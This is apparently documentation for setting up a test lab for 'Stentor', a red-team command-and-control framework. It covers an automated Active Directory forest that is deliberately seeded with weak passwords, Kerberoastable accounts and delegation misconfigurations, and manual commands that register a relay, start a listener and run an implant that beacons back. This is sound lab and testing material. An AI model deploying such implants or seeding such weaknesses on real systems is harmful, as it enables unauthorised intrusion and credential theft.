Skip to content

Lab Deployment

A Stentor lab provides a safe environment for testing C2 operations, validating implant functionality, and developing new techniques. This guide covers two deployment approaches: an automated IaC pipeline that deploys an 8-VM Active Directory forest with a single command, and a manual 3-VM setup for quick testing.


Prerequisites

The automated lab pipeline requires the following tools. Verify installation with make check (runs scripts/check-prerequisites.sh).

Tool Version Purpose Install
Packer 1.11+ Build VM templates from ISO hashicorp.com/packer
Terraform 1.9+ Provision VMs from templates hashicorp.com/terraform
Ansible 2.17+ Configure AD, users, GPOs pip install ansible
curl any Proxmox API calls Pre-installed on most systems
jq any JSON parsing brew install jq / apt install jq

Ansible collections (installed automatically by playbooks):

  • ansible.windows (2.5+) -- Windows module set
  • microsoft.ad (1.7+) -- Active Directory management

Lab Architecture

The automated pipeline deploys an 8-VM Active Directory forest on Proxmox, simulating a realistic corporate environment with domain controllers, workstations, file servers, and application servers.

graph TB
    subgraph Proxmox["Proxmox Host (<proxmox-ip>)"]
        subgraph DC["Domain Controllers"]
            DC01["DC01<br/>10.10.10.10<br/>Primary DC"]
            DC02["DC02<br/>10.10.10.11<br/>Replica DC"]
        end

        subgraph WS["Workstations"]
            WS01["WS01<br/>10.10.10.21<br/>Engineering"]
            WS02["WS02<br/>10.10.10.22<br/>HR"]
            WS03["WS03<br/>10.10.10.23<br/>Finance"]
        end

        subgraph SRV["Servers"]
            FILE01["FILE01<br/>10.10.10.30<br/>File Server"]
            SRV01["SRV01<br/>10.10.10.40<br/>SQL + IIS"]
            WEB01["WEB01<br/>10.10.10.50<br/>nginx/Apache"]
        end
    end

    DC01 <-->|Replication| DC02
    WS01 & WS02 & WS03 -->|Domain Join| DC01
    FILE01 & SRV01 -->|Domain Join| DC01

VM Inventory

VM VMID IP OS Role CPU RAM
DC01 200 10.10.10.10 Windows Server 2022 Primary Domain Controller 2 4 GB
DC02 201 10.10.10.11 Windows Server 2022 Replica Domain Controller 2 4 GB
WS01 210 10.10.10.21 Windows 10 Workstation (Engineering) 2 4 GB
WS02 211 10.10.10.22 Windows 10 Workstation (HR) 2 4 GB
WS03 212 10.10.10.23 Windows 10 Workstation (Finance) 2 4 GB
FILE01 220 10.10.10.30 Windows Server 2022 File Server 2 4 GB
SRV01 230 10.10.10.40 Windows Server 2022 App Server (SQL + IIS) 2 4 GB
WEB01 240 10.10.10.50 Ubuntu 22.04 Web Server (nginx/Apache) 2 2 GB

All VMs share the 10.10.10.0/24 subnet on Proxmox bridge vmbr0. DNS is served by DC01 (primary) and DC02 (secondary) for the lab.local domain. Gateway: 10.10.10.1 (Proxmox host bridge).


Quick Start

# 1. Configure Proxmox credentials and ISO paths
cp lab/.env.example lab/.env
# Edit lab/.env with your settings

# 2. Verify prerequisites
cd lab && make check

# 3. Deploy everything (templates + provision + configure + integrate)
make deploy

One command deployment

make deploy runs the complete four-stage pipeline sequentially: prerequisite check, Packer templates, Terraform provisioning, Ansible configuration, and C2 integration. The full pipeline takes approximately 2-3 hours on first run (most time spent building Windows templates from ISO).


Pipeline Overview

The lab uses a four-stage Infrastructure-as-Code pipeline. Each stage can be run independently or as part of the full make deploy pipeline.

flowchart LR
    A["Stage 1<br/><b>Packer</b><br/>make templates"] --> B["Stage 2<br/><b>Terraform</b><br/>make provision"]
    B --> C["Stage 3<br/><b>Ansible</b><br/>make configure"]
    C --> D["Stage 4<br/><b>C2 Integration</b><br/>make integrate"]

    A1["ISO files"] --> A
    A --> A2["VM Templates<br/>(9000-9002)"]
    B --> B2["8 Lab VMs<br/>(200-240)"]
    C --> C2["AD Forest<br/>lab.local"]
    D --> D2["Relay + Listener<br/>+ Beacon"]

Stage 1: Packer Templates (make templates)

Packer builds three base VM templates from ISO files on Proxmox storage. Templates are golden images that Terraform clones to create lab VMs.

Template Inventory

Template VMID OS Post-Build Configuration
Windows Server 2022 9000 Win Server 2022 Eval WinRM enabled, QEMU Guest Agent, VirtIO drivers, Sysprepped
Windows 10 Enterprise 9001 Win10 22H2 Eval WinRM enabled, QEMU Guest Agent, VirtIO drivers, Sysprepped
Ubuntu 22.04 LTS 9002 Ubuntu 22.04 Server SSH enabled, QEMU Guest Agent, cloud-init ready

Key behaviors:

  • Idempotent: Checks the Proxmox API before building; skips templates that already exist.
  • Individual builds: make template-win-server, make template-win10, make template-ubuntu
  • Build time: Windows templates take 30-60 minutes each (ISO install + Sysprep). Ubuntu takes approximately 15 minutes.

ISO prerequisite

ISOs must be uploaded to Proxmox storage (local:iso/) before building templates. Use the Proxmox web UI: Datacenter > Storage > local > ISO Images > Upload.

Download evaluation ISOs:

Key files:

Path Description
packer/*.pkr.hcl Packer template definitions
packer/files/autounattend/ Windows unattended install XML
packer/scripts/ Provisioning scripts (WinRM setup, Sysprep)
packer/http/ HTTP-served files (preseed, autoinstall)

Stage 2: Terraform Provisioning (make provision)

Terraform clones the Packer templates into 8 lab VMs with static IPs, resource allocation, and network configuration. It also generates the Ansible inventory file from Terraform outputs.

What it does:

  1. Clones each template into a full VM with assigned VMID, IP, CPU, and RAM.
  2. Configures network interfaces on the vmbr0 bridge with static IPs.
  3. Generates ansible/inventory/hosts.yml from Terraform outputs for seamless handoff to Stage 3.

Key commands:

# Provision all VMs
make provision

# View current Terraform state
make status

Variables are defined in terraform/variables.tf and can be overridden via lab/.env:

Variable Default Description
proxmox_endpoint -- Proxmox API URL
storage_pool local-lvm Proxmox storage pool for VM disks
network_bridge vmbr0 Network bridge for VM interfaces

Key files:

Path Description
terraform/main.tf Provider config and VM resource definitions
terraform/variables.tf Input variables (Proxmox connection, VM specs)
terraform/outputs.tf Ansible inventory generation from VM data
terraform/modules/vm/ Reusable VM module
terraform/templates/ Ansible inventory template

Stage 3: Ansible Configuration (make configure)

Ansible configures the complete Active Directory environment, transforming bare VMs into a realistic corporate network.

# Run all Ansible playbooks
make configure

Configuration Steps

Step Target Description
DC Promotion DC01, DC02 DC01 as forest root (lab.local), DC02 as replica with replication
Domain Join All Windows VMs Join all workstations and servers to lab.local domain
AD Population DC01 25 users, 5 departments, service accounts, nested groups
GPO Deployment Domain Workstation and server security policies, audit policies
Server Config FILE01, SRV01, WEB01 File shares, SQL/IIS installation, web services
Attack Seeding Various Weak passwords, cached credentials, delegation misconfigurations

Red team testing readiness

The Attack Seeding step deliberately introduces common AD misconfigurations:

  • Weak service account passwords (Kerberoastable SPNs)
  • Cached domain credentials on workstations
  • Unconstrained delegation on specific machines
  • Writable Group Policy paths
  • Overly permissive file share ACLs

These create realistic attack paths for testing Stentor's post-exploitation modules.

Key files:

Path Description
ansible/site.yml Main playbook entry point
ansible/group_vars/ Group variable files (domain settings, passwords)
ansible/roles/ Individual configuration roles
ansible/inventory/ Generated by Terraform (gitignored)

Stage 4: C2 Integration (make integrate)

The final stage connects Stentor's C2 infrastructure to the lab environment, establishing the relay-listener-beacon chain.

# Run C2 integration
make integrate

What it does:

  1. Registers the relay in the Stentor database (if not already present).
  2. Creates and starts an HTTPS listener on the relay.
  3. Deploys the implant to WS01 (or a custom VMID).
  4. Verifies the beacon appears in the Stentor backend.

Additional C2 Commands

# Check relay, listener, and beacon status
make c2-status

# Deploy implant to a specific VM
VMID=212 make c2-deploy-implant

Key files:

Path Description
scripts/c2-integrate.sh Full C2 integration script
scripts/c2-status.sh Status checker for relay/listener/beacon
scripts/c2-deploy-implant.sh Implant deployment to specific VMs

Configuration

Environment File

Copy lab/.env.example to lab/.env and configure the following sections.

Proxmox Connection

Two authentication methods are supported:

PROXMOX_URL=https://<proxmox-ip>:8006/api2/json
PROXMOX_NODE=proxmox
PROXMOX_USERNAME=root@pam
PROXMOX_PASSWORD=your-password
PROXMOX_URL=https://<proxmox-ip>:8006/api2/json
PROXMOX_NODE=proxmox
PROXMOX_API_TOKEN=root@pam!stentor-lab
PROXMOX_API_SECRET=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

Creating API tokens

Proxmox web UI > Datacenter > Permissions > API Tokens > Add. Use format user@realm!token-name.

ISO Paths

ISOs use Proxmox storage notation (local:iso/filename.iso), not filesystem paths.

ISO_WIN_SERVER=local:iso/SERVER_EVAL_x64FRE_en-us.iso
ISO_WIN10=local:iso/22631.2428_PROFESSIONAL_x64_en-us.iso
ISO_UBUNTU=local:iso/ubuntu-22.04.4-live-server-amd64.iso
ISO_VIRTIO=local:iso/virtio-win.iso

Common mistake

Do not use filesystem paths like /var/lib/vz/template/iso/ubuntu.iso. Packer communicates with the Proxmox API, which expects storage notation.

VMID Ranges

Range Purpose Details
100-111 Existing manual VMs Legacy DC01, Kali, Stentor Server, Win10 targets
200-240 Automated lab VMs DC01-DC02, WS01-WS03, FILE01, SRV01, WEB01
9000-9002 Packer templates Win Server, Win10, Ubuntu base images

The automated lab is designed to coexist with (and eventually replace) the manual VMs since they use different VMID ranges.

Network Settings

NETWORK_BRIDGE=vmbr0
NETWORK_GATEWAY=10.10.10.1
NETWORK_SUBNET=24
STORAGE_POOL=local-lvm

Management Commands

# Full pipeline (check + templates + provision + configure + integrate)
make deploy

# Individual stages
make templates          # Build all Packer VM templates (idempotent)
make provision          # Deploy VMs with Terraform
make configure          # Run Ansible playbooks
make integrate          # Connect Stentor C2

# Status
make status             # Show current VM state via Terraform
make c2-status          # Check relay/listener/beacon status

# Teardown
make destroy            # Remove VMs (keep templates for fast rebuild)
make clean              # Remove VMs AND templates (full reset)

Teardown Options

Command Removes VMs Removes Templates Rebuild Time
make destroy Yes No ~30 min (provision + configure)
make clean Yes Yes 2-3 hours (templates + provision + configure)

Preserve templates for fast iteration

Use make destroy instead of make clean when iterating on Ansible configuration. Templates take 30-60 minutes each to build from ISO, but Terraform can re-provision VMs from templates in minutes.


Troubleshooting

Symptom Cause Fix
401 Proxmox auth Username missing realm suffix Use root@pam not root. API tokens use user@pam!token-name. Test: curl -sk -d "username=root@pam&password=PASS" https://HOST:8006/api2/json/access/ticket
ISO not found Using filesystem path instead of storage notation Use local:iso/filename.iso, not /var/lib/vz/template/iso/filename.iso. Verify via Proxmox UI > Storage > local > ISO Images.
Storage pool not found Pool name varies across Proxmox installations Check available pools: pvesm status on Proxmox host. Update STORAGE_POOL in .env.
VMID already in use Conflict with manually-created VMs Check existing VMs: qm list on Proxmox host. Adjust VMID variables in .env.
WinRM timeout VirtIO drivers not loaded or WinRM not enabled Ensure VirtIO ISO is uploaded and path is correct in .env. Verify autounattend.xml includes WinRM setup. Packer waits up to 60 minutes before timing out.
Terraform state drift VMs modified outside Terraform Run terraform refresh to sync state. Never manually modify Terraform-managed VMs via the Proxmox UI. Use terraform import for manual resources.
Ansible connection refused VMs not fully booted or WinRM not ready Wait 2-3 minutes after provisioning. Test connectivity: ansible -i inventory/hosts.yml all -m win_ping (Windows) or -m ping (Linux).
Domain join fails DC01 not promoted yet or DNS misconfigured Ensure Ansible roles run in order (DC promotion before domain join). Verify DNS: workstations must use DC01/DC02 as DNS servers.

Directory Structure

lab/
  Makefile                    # Pipeline orchestration
  .env.example                # Configuration template (copy to .env)
  .gitignore                  # Protects secrets, state, cache
  README.md                   # Source documentation
  packer/
    *.pkr.hcl                 # Packer template definitions
    http/                     # HTTP-served files (preseed, autoinstall)
    scripts/                  # Provisioning scripts (WinRM, Sysprep)
    files/autounattend/       # Windows unattended install XML
  terraform/
    main.tf                   # Provider config, VM definitions
    variables.tf              # Input variables
    outputs.tf                # Ansible inventory generation
    modules/vm/               # Reusable VM module
    templates/                # Ansible inventory template
  ansible/
    site.yml                  # Main playbook entry
    inventory/                # Generated by Terraform (gitignored)
    group_vars/               # Group variable files
    roles/                    # Role per configuration task
  scripts/
    check-prerequisites.sh    # Tool verification
    c2-integrate.sh           # C2 integration script
    c2-status.sh              # Status checker
    c2-deploy-implant.sh      # Implant deployment

Quick Lab Setup (Manual 3-VM)

For operators who want a minimal test environment without the full AD forest, Stentor can run on a simple 3-VM setup.

Architecture

graph LR
    subgraph Proxmox["Proxmox Host"]
        VM103["Stentor Server<br/>VM 103 / 10.0.0.10<br/>Docker: backend + DB + UI"]
        VM102["Kali Relay<br/>VM 102 / 10.0.0.50<br/>stentor-relay service"]
        VM110["Win10 Target<br/>VM 110 / 10.0.0.20<br/>implant.exe"]
    end

    VM103 <-->|WebSocket| VM102
    VM110 -->|HTTPS :8443| VM102
VM VMID IP Role Credentials
Stentor Server 103 10.0.0.10 Docker host (backend + DB + UI) stentor/<server-password>
Kali Relay 102 10.0.0.50 Relay agent, C2 listeners root/<relay-password>
Win10 Target 110 10.0.0.20 Implant execution target QEMU Guest Agent

Setup Steps

  1. Deploy server: Run ./update-stentor.sh to deploy Stentor to VM 103 via Docker.

  2. Login and get token:

    TOKEN=$(curl -s -X POST https://stentor.app/api/v1/auth/login \
      -H "Content-Type: application/json" \
      -d '{"email":"[email protected]","password":"your-password"}' \
      | jq -r '.access_token')
    

  3. Register relay in DB (required before relay can connect):

    ssh root@<proxmox-ip> 'ssh [email protected] \
      "docker exec -i stentor-db psql -U stentor -d stentor_db"' <<< \
      "INSERT INTO relays (id, name, description, ip_address, status) \
       VALUES ('aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee', 'Kali Relay', \
       'Kali relay agent', '10.0.0.50', 'online') \
       ON CONFLICT (id) DO NOTHING;"
    

  4. Restart relay service:

    ssh root@<proxmox-ip> 'sshpass -p "<relay-password>" ssh [email protected] \
      "systemctl restart stentor-relay"'
    

  5. Create and start listener:

    LISTENER_ID=$(curl -s -X POST https://stentor.app/api/v1/listeners \
      -H "Authorization: Bearer $TOKEN" \
      -H "Content-Type: application/json" \
      -d '{"name":"HTTPS Relay","type":"https","host":"10.0.0.50",
           "port":8443,"relay_id":"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"}' \
      | jq -r '.id')
    
    curl -s -X POST "https://stentor.app/api/v1/listeners/$LISTENER_ID/start" \
      -H "Authorization: Bearer $TOKEN"
    

  6. Deploy and run implant (see Relay Management for build instructions):

    # Kill old implant if running
    ssh root@<proxmox-ip> 'qm guest exec 110 -- cmd /c "taskkill /F /IM implant.exe"'
    
    # Run implant (CRITICAL: no space before &&)
    ssh root@<proxmox-ip> 'qm guest exec 110 --timeout 5 -- cmd /c \
      "set IMPLANT_C2_URL=https://10.0.0.50:8443&& \
       set IMPLANT_INSECURE_SKIP_VERIFY=true&& \
       C:\\Users\\Public\\implant.exe"'
    

  7. Verify beacon:

    curl -s https://stentor.app/api/v1/c2/beacons \
      -H "Authorization: Bearer $TOKEN" | jq
    

Common Gotchas

Manual setup pitfalls

  • Deploy confirmation: update-stentor.sh requires typing "yes" (not "y", not piping yes |).
  • Login response field: The token is in access_token, not token.
  • Beacon API path: Use /api/v1/c2/beacons, not /api/v1/cockpit/beacons.
  • cmd.exe env vars: No space before && -- trailing spaces become part of the variable value.
  • Relay before connect: The relay must be registered in the DB before starting the relay service (WebSocket returns 404 otherwise).
  • Listener must be started: Creating a listener sets status to stopped. You must also call the start endpoint.